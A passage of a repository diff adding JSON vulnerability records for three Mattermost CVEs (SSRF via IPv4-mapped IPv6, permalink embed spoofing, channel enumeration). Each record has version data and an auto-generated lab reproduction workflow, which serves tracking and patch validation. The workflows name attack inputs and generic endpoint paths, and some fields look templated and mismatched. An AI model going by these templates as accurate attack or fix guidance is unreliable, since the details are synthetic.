"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Mattermost"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 2,
"entity_ref_count": 2,
"advisory_scope": "repo",
"version_confidence": "high",
"workflow_id": "mattermost--CVE-2026-24458--workflow"
}
}

233
08-threat-intel/registry/advisories/mattermost--CVE-2026-2455.json 普通文件
查看文件

@@ -0,0 +1,233 @@
{
"canonical_id": "mattermost--CVE-2026-2455",
"system_id": "mattermost",
"display_name": "Mattermost",
"category": "platforms",
"advisory_mode": "core",
"title": "Mattermost fails to canonicalize IPv4-mapped IPv6 addresses before reserved IP validation",
"summary": "Mattermost versions 11.3.x <= 11.3.0, 11.2.x <= 11.2.2, 10.11.x <= 10.11.10 fail to canonicalize IPv4-mapped IPv6 addresses before reserved IP validation which allows an attacker to perform SSRF attacks against internal services via IPv4-mapped IPv6 literals (e.g., [::ffff:127.0.0.1]).. Mattermost Advisory ID: MMSA-2026-00585",
"published_at": "2026-03-16T15:30:47Z",
"updated_at": "2026-03-23T18:56:08.125706Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "ecosystem-authority",
"official_source_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2455",
"secondary_source_urls": [
"https://github.com/advisories/GHSA-gqv7-j2j8-qmwq",
"https://github.com/mattermost/mattermost/commit/5d787969c2d5ab591a9dcd61b0810475eed7a646",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"aliases": [
"CVE-2026-2455",
"GO-2026-4746",
"GHSA-gqv7-j2j8-qmwq"
],
"cve_ids": [
"CVE-2026-2455"
],
"ghsa_ids": [
"GHSA-gqv7-j2j8-qmwq"
],
"osv_ids": [
"GHSA-gqv7-j2j8-qmwq",
"GO-2026-4746"
],
"affected_versions": [
"introduced=0, fixed<8.0.0-20260129133647-5d787969c2d5",
"introduced=0, fixed<5.3.2-0.20260129133647-5d787969c2d5",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_versions": [
"8.0.0-20260129133647-5d787969c2d5",
"5.3.2-0.20260129133647-5d787969c2d5",
"10.11.11",
"11.2.3",
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"package_name": "github.com/mattermost/mattermost-server",
"render_markdown": true,
"case_path": "07-framework-security/platforms/mattermost/cases/mattermost-cve-2026-2455.md",
"secure_code_topics": [
"authz-server-side-recheck",
"xss-output-encoding",
"token-cookie-storage",
"ssrf-url-validation",
"dependency-upgrade-policy"
],
"status": "generated",
"triage_reasons": [],
"entity_refs": [
{
"entity_id": "mattermost",
"entity_type": "system",
"relation": "root-system",
"root_system_id": "mattermost",
"official": true
},
{
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"entity_type": "repo",
"relation": "affected-component",
"root_system_id": "mattermost",
"official": false
}
],
"affected_components": [
{
"name": "mattermost / mattermost-server",
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"scope": "repo",
"package_name": "github.com/mattermost/mattermost-server",
"official": false
}
],
"affected_version_ranges": [
"introduced=0, fixed<8.0.0-20260129133647-5d787969c2d5",
"introduced=0, fixed<5.3.2-0.20260129133647-5d787969c2d5",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_version_ranges": [
"8.0.0-20260129133647-5d787969c2d5",
"5.3.2-0.20260129133647-5d787969c2d5",
"10.11.11",
"11.2.3",
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"introduced_version": "introduced=0",
"patched_version": "8.0.0-20260129133647-5d787969c2d5",
"version_evidence_sources": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-2455",
"https://github.com/advisories/GHSA-gqv7-j2j8-qmwq",
"https://github.com/mattermost/mattermost/commit/5d787969c2d5ab591a9dcd61b0810475eed7a646",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"affected_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-8-0-0-20260129133647-5d787969c2d5",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-5-3-2-0-20260129133647-5d787969c2d5",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-fixed-10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-2-0-rc1-fixed-11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-3-0-rc1-fixed-11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-incompatible-fixed-10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0"
],
"fixed_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260129133647-5d787969c2d5",
"mattermost--repo--github-com-mattermost-mattermost-server--5-3-2-0-20260129133647-5d787969c2d5",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1-incompatible"
],
"patched_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260129133647-5d787969c2d5"
],
"version_sync_confidence": "high",
"advisory_scope": "repo",
"version_confidence": "high",
"version_gap_reason": "",
"version_resolution_needed": false,
"workflow": {
"workflow_id": "mattermost--CVE-2026-2455--workflow",
"vuln_family": "ssrf",
"entry_surface": "remote-fetch-or-webhook-endpoint",
"preconditions": [
"\u4ec5\u5728 lab-local\u3001lab-public \u6216\u660e\u786e\u6388\u6743\u76ee\u6807\u4e2d\u6267\u884c\u3002",
"\u786e\u8ba4\u76ee\u6807\u547d\u4e2d\u7248\u672c\u65ad\u8a00: introduced=0, fixed<8.0.0-20260129133647-5d787969c2d5, introduced=0, fixed<5.3.2-0.20260129133647-5d787969c2d5, introduced=10.11.0-rc1, fixed<10.11.11",
"\u82e5\u5bf9\u8c61\u5c5e\u4e8e `repo`\uff0c\u5148\u786e\u8ba4\u6269\u5c55/\u4ed3\u5e93/\u5305\u5df2\u542f\u7528\u5e76\u5904\u4e8e\u53d7\u5f71\u54cd\u7248\u672c\u3002"
],
"required_role": "editor-or-admin",
"affected_version_assertion": [
"introduced=0, fixed<8.0.0-20260129133647-5d787969c2d5",
"introduced=0, fixed<5.3.2-0.20260129133647-5d787969c2d5",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"trigger_vector": "\u5bf9 `ssrf` \u5bb6\u65cf\u5165\u53e3\u6295\u9012\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\uff0c\u6bd4\u8f83\u4fee\u590d\u524d\u540e\u5dee\u5f02\u3002",
"request_or_ui_path": [
"/webhook/test",
"/remote-fetch",
"/import-url"
],
"input_shape": "\u63d0\u4ea4\u53d7\u63a7\u56de\u73af\u6216\u54e8\u5175 URL\uff0c\u9a8c\u8bc1\u534f\u8bae\u3001\u4e3b\u673a\u3001IP \u4e0e\u91cd\u5b9a\u5411\u9650\u5236\u3002",
"expected_unsafe_behavior": "\u670d\u52a1\u7aef\u5411\u53d7\u63a7\u76ee\u6807\u53d1\u8d77\u975e\u9884\u671f\u8bf7\u6c42\u3002",
"server_evidence_points": [
"\u5e94\u7528\u65e5\u5fd7\u4e2d\u7684\u547d\u4e2d\u8def\u5f84\u3001\u9274\u6743\u51b3\u7b56\u548c\u5f02\u5e38\u6808",
"\u53cd\u5411\u4ee3\u7406\u6216\u8fb9\u754c\u5c42\u65e5\u5fd7\u4e2d\u7684\u8bf7\u6c42\u5934\u3001\u6765\u6e90 IP \u4e0e\u8def\u7531\u51b3\u7b56"
],
"browser_evidence_points": [
"\u57fa\u7ebf\u622a\u56fe\u4e0e\u653b\u51fb\u540e\u622a\u56fe\u7684 DOM/\u89c6\u89c9\u5dee\u5f02",
"console\u3001network \u4e0e response metadata \u4e2d\u7684\u5f02\u5e38\u4fe1\u53f7"
],
"db_or_fs_evidence_points": [
"\u6570\u636e\u5e93\u4e2d\u65b0\u589e/\u8d8a\u6743\u8bfb\u53d6\u7684\u6d4b\u8bd5\u6570\u636e",
"\u6587\u4ef6\u7cfb\u7edf\u4e2d\u65b0\u589e\u4e0a\u4f20\u6837\u672c\u3001\u7f13\u5b58\u6761\u76ee\u6216\u8d8a\u6743\u8bfb\u53d6\u75d5\u8ff9"
],
"detection_signals": [
"WAF / reverse proxy \u5f02\u5e38\u65e5\u5fd7\u3001\u8bbf\u95ee\u65e5\u5fd7\u548c\u544a\u8b66",
"\u5e94\u7528\u5ba1\u8ba1\u65e5\u5fd7\u4e2d\u7684\u6743\u9650\u9519\u8bef\u3001\u91cd\u5b9a\u5411\u5f02\u5e38\u3001\u6a21\u677f\u6e32\u67d3\u6216\u4e0a\u4f20\u843d\u76d8\u4e8b\u4ef6"
],
"mitigation_summary": "\u4f18\u5148\u5347\u7ea7\u5230\u4fee\u590d\u7248\u672c\uff0c\u5e76\u540c\u65f6\u6536\u7d27\u8f93\u5165\u6821\u9a8c\u3001\u670d\u52a1\u7aef\u9274\u6743\u3001\u4ee3\u7406\u4fe1\u4efb\u8fb9\u754c\u3001\u6269\u5c55\u5b89\u88c5\u4fe1\u4efb\u548c\u5ba1\u8ba1\u65e5\u5fd7\u3002",
"patch_validation_steps": [
"\u786e\u8ba4\u76ee\u6807\u7248\u672c\u4ece `introduced=0, fixed<8.0.0-20260129133647-5d787969c2d5, introduced=0, fixed<5.3.2-0.20260129133647-5d787969c2d5, introduced=10.11.0-rc1, fixed<10.11.11` \u5347\u7ea7\u6216\u56de\u79fb\u5230 `8.0.0-20260129133647-5d787969c2d5`\u3002",
"\u4fdd\u7559\u540c\u4e00\u7ec4\u53d7\u63a7\u8f93\u5165\uff0c\u5728\u4fee\u590d\u524d\u540e\u5206\u522b\u6267\u884c\u5e76\u6bd4\u5bf9\u54cd\u5e94\u3001\u65e5\u5fd7\u4e0e\u6d4f\u89c8\u5668\u8bc1\u636e\u3002",
"\u786e\u8ba4\u4fee\u590d\u540e\u4ec5\u4fdd\u7559\u9884\u671f\u4e1a\u52a1\u884c\u4e3a\uff0c\u4e0d\u518d\u89e6\u53d1\u8d8a\u6743\u3001\u56de\u663e\u3001\u5f02\u5e38\u6e32\u67d3\u6216\u9519\u8bef\u8bf7\u6c42\u3002",
"\u8865\u5145 `ssrf` \u65cf\u81ea\u52a8\u5316\u56de\u5f52\uff0c\u907f\u514d\u540c\u7c7b\u8def\u5f84\u5728\u63d2\u4ef6\u3001\u4e3b\u9898\u6216\u4ee3\u7406\u94fe\u4e2d\u56de\u5f52\u3002"
],
"lab_safety_notes": [
"\u53ea\u4f7f\u7528\u56de\u73af\u5730\u5740\u3001\u54e8\u5175\u76ee\u6807\u3001\u65e0\u5bb3\u6837\u672c\u6216\u53ef\u56de\u6eda\u6d4b\u8bd5\u6570\u636e\u3002",
"\u7981\u6b62\u9020\u6210\u6301\u4e45\u7834\u574f\u3001\u8d8a\u6743\u4e0b\u8f7d\u771f\u5b9e\u6570\u636e\u6216\u4e0d\u53ef\u56de\u6eda side effect\u3002",
"\u5982\u9700\u6d4f\u89c8\u5668\u8bc1\u636e\uff0c\u4fdd\u7559 baseline / proof \u4e24\u4efd\u5feb\u7167\u4ee5\u53ca console / network \u8bb0\u5f55\u3002"
],
"review_state": "ready"
},
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"historical_status": null,
"latest_status": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "xss-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Mattermost"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 2,
"entity_ref_count": 2,
"advisory_scope": "repo",
"version_confidence": "high",
"workflow_id": "mattermost--CVE-2026-2455--workflow"
}
}

230
08-threat-intel/registry/advisories/mattermost--CVE-2026-2457.json 普通文件
查看文件

@@ -0,0 +1,230 @@
{
"canonical_id": "mattermost--CVE-2026-2457",
"system_id": "mattermost",
"display_name": "Mattermost",
"category": "platforms",
"advisory_mode": "core",
"title": "Mattermost allows attackers to spoof permalink embeds",
"summary": "Mattermost versions 11.3.x <= 11.3.0, 11.2.x <= 11.2.2, 10.11.x <= 10.11.10 fail to sanitize client-supplied post metadata which allows an authenticated attacker to spoof permalink embeds impersonating other users via crafted PUT requests to the post update API endpoint. Mattermost Advisory ID: MMSA-2025-00569",
"published_at": "2026-03-16T15:30:42Z",
"updated_at": "2026-03-23T18:56:18.286997Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "ecosystem-authority",
"official_source_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2457",
"secondary_source_urls": [
"https://github.com/advisories/GHSA-ph22-fw5m-w2q9",
"https://github.com/mattermost/mattermost/commit/9efe617be8b8f1d036e12721e8e73b69a543ed34",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"aliases": [
"CVE-2026-2457",
"GO-2026-4732",
"GHSA-ph22-fw5m-w2q9"
],
"cve_ids": [
"CVE-2026-2457"
],
"ghsa_ids": [
"GHSA-ph22-fw5m-w2q9"
],
"osv_ids": [
"GHSA-ph22-fw5m-w2q9",
"GO-2026-4732"
],
"affected_versions": [
"introduced=0, fixed<8.0.0-20260123211116-9efe617be8b8",
"introduced=0, fixed<5.3.2-0.20260123211116-9efe617be8b8",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_versions": [
"8.0.0-20260123211116-9efe617be8b8",
"5.3.2-0.20260123211116-9efe617be8b8",
"10.11.11",
"11.2.3",
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"package_name": "github.com/mattermost/mattermost-server",
"render_markdown": true,
"case_path": "07-framework-security/platforms/mattermost/cases/mattermost-cve-2026-2457.md",
"secure_code_topics": [
"authz-server-side-recheck",
"xss-output-encoding",
"token-cookie-storage",
"dependency-upgrade-policy"
],
"status": "generated",
"triage_reasons": [],
"entity_refs": [
{
"entity_id": "mattermost",
"entity_type": "system",
"relation": "root-system",
"root_system_id": "mattermost",
"official": true
},
{
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"entity_type": "repo",
"relation": "affected-component",
"root_system_id": "mattermost",
"official": false
}
],
"affected_components": [
{
"name": "mattermost / mattermost-server",
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"scope": "repo",
"package_name": "github.com/mattermost/mattermost-server",
"official": false
}
],
"affected_version_ranges": [
"introduced=0, fixed<8.0.0-20260123211116-9efe617be8b8",
"introduced=0, fixed<5.3.2-0.20260123211116-9efe617be8b8",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_version_ranges": [
"8.0.0-20260123211116-9efe617be8b8",
"5.3.2-0.20260123211116-9efe617be8b8",
"10.11.11",
"11.2.3",
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"introduced_version": "introduced=0",
"patched_version": "8.0.0-20260123211116-9efe617be8b8",
"version_evidence_sources": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-2457",
"https://github.com/advisories/GHSA-ph22-fw5m-w2q9",
"https://github.com/mattermost/mattermost/commit/9efe617be8b8f1d036e12721e8e73b69a543ed34",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"affected_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-8-0-0-20260123211116-9efe617be8b8",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-5-3-2-0-20260123211116-9efe617be8b8",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-fixed-10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-2-0-rc1-fixed-11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-3-0-rc1-fixed-11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-incompatible-fixed-10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0"
],
"fixed_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260123211116-9efe617be8b8",
"mattermost--repo--github-com-mattermost-mattermost-server--5-3-2-0-20260123211116-9efe617be8b8",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1-incompatible"
],
"patched_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260123211116-9efe617be8b8"
],
"version_sync_confidence": "high",
"advisory_scope": "repo",
"version_confidence": "high",
"version_gap_reason": "",
"version_resolution_needed": false,
"workflow": {
"workflow_id": "mattermost--CVE-2026-2457--workflow",
"vuln_family": "unknown",
"entry_surface": "repo-surface",
"preconditions": [
"\u4ec5\u5728 lab-local\u3001lab-public \u6216\u660e\u786e\u6388\u6743\u76ee\u6807\u4e2d\u6267\u884c\u3002",
"\u786e\u8ba4\u76ee\u6807\u547d\u4e2d\u7248\u672c\u65ad\u8a00: introduced=0, fixed<8.0.0-20260123211116-9efe617be8b8, introduced=0, fixed<5.3.2-0.20260123211116-9efe617be8b8, introduced=10.11.0-rc1, fixed<10.11.11",
"\u82e5\u5bf9\u8c61\u5c5e\u4e8e `repo`\uff0c\u5148\u786e\u8ba4\u6269\u5c55/\u4ed3\u5e93/\u5305\u5df2\u542f\u7528\u5e76\u5904\u4e8e\u53d7\u5f71\u54cd\u7248\u672c\u3002"
],
"required_role": "unknown",
"affected_version_assertion": [
"introduced=0, fixed<8.0.0-20260123211116-9efe617be8b8",
"introduced=0, fixed<5.3.2-0.20260123211116-9efe617be8b8",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"trigger_vector": "\u5bf9 `unknown` \u5bb6\u65cf\u5165\u53e3\u6295\u9012\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\uff0c\u6bd4\u8f83\u4fee\u590d\u524d\u540e\u5dee\u5f02\u3002",
"request_or_ui_path": [
"/repo"
],
"input_shape": "\u63d0\u4ea4\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\u3002",
"expected_unsafe_behavior": "\u76ee\u6807\u8868\u73b0\u51fa\u8d85\u51fa\u8bbe\u8ba1\u8fb9\u754c\u7684\u884c\u4e3a\u3002",
"server_evidence_points": [
"\u5e94\u7528\u65e5\u5fd7\u4e2d\u7684\u547d\u4e2d\u8def\u5f84\u3001\u9274\u6743\u51b3\u7b56\u548c\u5f02\u5e38\u6808",
"\u53cd\u5411\u4ee3\u7406\u6216\u8fb9\u754c\u5c42\u65e5\u5fd7\u4e2d\u7684\u8bf7\u6c42\u5934\u3001\u6765\u6e90 IP \u4e0e\u8def\u7531\u51b3\u7b56"
],
"browser_evidence_points": [
"\u57fa\u7ebf\u622a\u56fe\u4e0e\u653b\u51fb\u540e\u622a\u56fe\u7684 DOM/\u89c6\u89c9\u5dee\u5f02",
"console\u3001network \u4e0e response metadata \u4e2d\u7684\u5f02\u5e38\u4fe1\u53f7"
],
"db_or_fs_evidence_points": [
"\u6570\u636e\u5e93\u4e2d\u65b0\u589e/\u8d8a\u6743\u8bfb\u53d6\u7684\u6d4b\u8bd5\u6570\u636e",
"\u6587\u4ef6\u7cfb\u7edf\u4e2d\u65b0\u589e\u4e0a\u4f20\u6837\u672c\u3001\u7f13\u5b58\u6761\u76ee\u6216\u8d8a\u6743\u8bfb\u53d6\u75d5\u8ff9"
],
"detection_signals": [
"WAF / reverse proxy \u5f02\u5e38\u65e5\u5fd7\u3001\u8bbf\u95ee\u65e5\u5fd7\u548c\u544a\u8b66",
"\u5e94\u7528\u5ba1\u8ba1\u65e5\u5fd7\u4e2d\u7684\u6743\u9650\u9519\u8bef\u3001\u91cd\u5b9a\u5411\u5f02\u5e38\u3001\u6a21\u677f\u6e32\u67d3\u6216\u4e0a\u4f20\u843d\u76d8\u4e8b\u4ef6"
],
"mitigation_summary": "\u4f18\u5148\u5347\u7ea7\u5230\u4fee\u590d\u7248\u672c\uff0c\u5e76\u540c\u65f6\u6536\u7d27\u8f93\u5165\u6821\u9a8c\u3001\u670d\u52a1\u7aef\u9274\u6743\u3001\u4ee3\u7406\u4fe1\u4efb\u8fb9\u754c\u3001\u6269\u5c55\u5b89\u88c5\u4fe1\u4efb\u548c\u5ba1\u8ba1\u65e5\u5fd7\u3002",
"patch_validation_steps": [
"\u786e\u8ba4\u76ee\u6807\u7248\u672c\u4ece `introduced=0, fixed<8.0.0-20260123211116-9efe617be8b8, introduced=0, fixed<5.3.2-0.20260123211116-9efe617be8b8, introduced=10.11.0-rc1, fixed<10.11.11` \u5347\u7ea7\u6216\u56de\u79fb\u5230 `8.0.0-20260123211116-9efe617be8b8`\u3002",
"\u4fdd\u7559\u540c\u4e00\u7ec4\u53d7\u63a7\u8f93\u5165\uff0c\u5728\u4fee\u590d\u524d\u540e\u5206\u522b\u6267\u884c\u5e76\u6bd4\u5bf9\u54cd\u5e94\u3001\u65e5\u5fd7\u4e0e\u6d4f\u89c8\u5668\u8bc1\u636e\u3002",
"\u786e\u8ba4\u4fee\u590d\u540e\u4ec5\u4fdd\u7559\u9884\u671f\u4e1a\u52a1\u884c\u4e3a\uff0c\u4e0d\u518d\u89e6\u53d1\u8d8a\u6743\u3001\u56de\u663e\u3001\u5f02\u5e38\u6e32\u67d3\u6216\u9519\u8bef\u8bf7\u6c42\u3002",
"\u8865\u5145 `unknown` \u65cf\u81ea\u52a8\u5316\u56de\u5f52\uff0c\u907f\u514d\u540c\u7c7b\u8def\u5f84\u5728\u63d2\u4ef6\u3001\u4e3b\u9898\u6216\u4ee3\u7406\u94fe\u4e2d\u56de\u5f52\u3002"
],
"lab_safety_notes": [
"\u53ea\u4f7f\u7528\u56de\u73af\u5730\u5740\u3001\u54e8\u5175\u76ee\u6807\u3001\u65e0\u5bb3\u6837\u672c\u6216\u53ef\u56de\u6eda\u6d4b\u8bd5\u6570\u636e\u3002",
"\u7981\u6b62\u9020\u6210\u6301\u4e45\u7834\u574f\u3001\u8d8a\u6743\u4e0b\u8f7d\u771f\u5b9e\u6570\u636e\u6216\u4e0d\u53ef\u56de\u6eda side effect\u3002",
"\u5982\u9700\u6d4f\u89c8\u5668\u8bc1\u636e\uff0c\u4fdd\u7559 baseline / proof \u4e24\u4efd\u5feb\u7167\u4ee5\u53ca console / network \u8bb0\u5f55\u3002"
],
"review_state": "ready"
},
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"historical_status": null,
"latest_status": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "xss-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Mattermost"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 2,
"entity_ref_count": 2,
"advisory_scope": "repo",
"version_confidence": "high",
"workflow_id": "mattermost--CVE-2026-2457--workflow"
}
}

230
08-threat-intel/registry/advisories/mattermost--CVE-2026-2458.json 普通文件
查看文件

@@ -0,0 +1,230 @@
{
"canonical_id": "mattermost--CVE-2026-2458",
"system_id": "mattermost",
"display_name": "Mattermost",
"category": "platforms",
"advisory_mode": "core",
"title": "Mattermost allows a removed team member to enumerate all public channels within a private team",
"summary": "Mattermost versions 11.3.x <= 11.3.0, 11.2.x <= 11.2.2, 10.11.x <= 10.11.10 fail to properly validate team membership when searching channels which allows a removed team member to enumerate all public channels within a private team via the channel search API endpoint. Mattermost Advisory ID: MMSA-2025-00568",
"published_at": "2026-03-16T15:30:43Z",
"updated_at": "2026-03-23T18:56:02.455815Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "ecosystem-authority",
"official_source_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2458",
"secondary_source_urls": [
"https://github.com/advisories/GHSA-679f-wmrg-qf57",
"https://github.com/mattermost/mattermost/commit/a18b80ba4c324b74b3d47951c33957305af4a099",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"aliases": [
"CVE-2026-2458",
"GO-2026-4729",
"GHSA-679f-wmrg-qf57"
],
"cve_ids": [
"CVE-2026-2458"
],
"ghsa_ids": [
"GHSA-679f-wmrg-qf57"
],
"osv_ids": [
"GHSA-679f-wmrg-qf57",
"GO-2026-4729"
],
"affected_versions": [
"introduced=0, fixed<8.0.0-20260113182106-a18b80ba4c32",
"introduced=0, fixed<5.3.2-0.20260113182106-a18b80ba4c32",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_versions": [
"8.0.0-20260113182106-a18b80ba4c32",
"5.3.2-0.20260113182106-a18b80ba4c32",
"10.11.11",
"11.2.3",
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"package_name": "github.com/mattermost/mattermost-server",
"render_markdown": true,
"case_path": "07-framework-security/platforms/mattermost/cases/mattermost-cve-2026-2458.md",
"secure_code_topics": [
"authz-server-side-recheck",
"xss-output-encoding",
"token-cookie-storage",
"dependency-upgrade-policy"
],
"status": "generated",
"triage_reasons": [],
"entity_refs": [
{
"entity_id": "mattermost",
"entity_type": "system",
"relation": "root-system",
"root_system_id": "mattermost",
"official": true
},
{
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"entity_type": "repo",
"relation": "affected-component",
"root_system_id": "mattermost",
"official": false
}
],
"affected_components": [
{
"name": "mattermost / mattermost-server",
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"scope": "repo",
"package_name": "github.com/mattermost/mattermost-server",
"official": false
}
],
"affected_version_ranges": [
"introduced=0, fixed<8.0.0-20260113182106-a18b80ba4c32",
"introduced=0, fixed<5.3.2-0.20260113182106-a18b80ba4c32",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_version_ranges": [
"8.0.0-20260113182106-a18b80ba4c32",
"5.3.2-0.20260113182106-a18b80ba4c32",
"10.11.11",
"11.2.3",
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"introduced_version": "introduced=0",
"patched_version": "8.0.0-20260113182106-a18b80ba4c32",
"version_evidence_sources": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-2458",
"https://github.com/advisories/GHSA-679f-wmrg-qf57",
"https://github.com/mattermost/mattermost/commit/a18b80ba4c324b74b3d47951c33957305af4a099",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"affected_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-8-0-0-20260113182106-a18b80ba4c32",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-5-3-2-0-20260113182106-a18b80ba4c32",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-fixed-10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-2-0-rc1-fixed-11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-3-0-rc1-fixed-11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-incompatible-fixed-10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0"
],
"fixed_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260113182106-a18b80ba4c32",
